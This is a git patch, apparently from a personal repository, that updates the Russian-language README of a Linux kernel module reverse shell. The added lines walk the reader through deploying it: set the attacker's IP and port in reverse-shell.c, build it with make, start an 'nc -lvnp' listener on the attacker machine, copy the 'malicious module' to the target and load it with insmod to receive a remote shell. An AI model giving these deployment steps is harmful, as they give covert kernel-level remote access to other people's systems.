From a7eb4c46ea19af5fdaa4ff17b197b6eee64932e7 Mon Sep 17 00:00:00 2001 From: Vadim Belous Date: Sat, 6 Jul 2024 17:10:46 +0300 Subject: [PATCH] Update README.md --- README.md | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2a59cc4..d5bd826 100644 --- a/README.md +++ b/README.md @@ -11,7 +11,7 @@ sudo apt install build-essential linux-headers-$(uname -r) ``` -После клонирования репозитория, откройте файл `reverse-shell.c` и измените 13 строку, указав ваш IP-адрес и порт (заранее позаботьтесь о запуске прослушивателя). Затем соберите модуль и перенесите его на целевую систему: +После клонирования репозитория, откройте файл `reverse-shell.c` и измените 13 строку, указав ваш IP-адрес и порт. Затем соберите модуль: ```bash git clone https://git.vadimbelous.com/vadim_belous/lkm_reverse_shell.git @@ -20,7 +20,21 @@ $EDITOR reverse-shell.c make ``` -Получившийся в результате успешной сборки файл `reverse-shell.ko` это и есть нужный модуль ядра. +Получившийся в результате успешной сборки файл `reverse-shell.ko` это и есть нужный модуль ядра + +Запустите прослушиватель на машине атакующего: + +```bash +nc -lvnp $PORT +``` + +Перенесите вредоносный модуль на целевую машину и подгрузите его в ядро: + +```bash +insmod reverse-shell.ko +``` + +Если вы всё сделали правильно, на прослушиватель придёт обратный вызов и установится обратная командная оболочка ### Disclaimer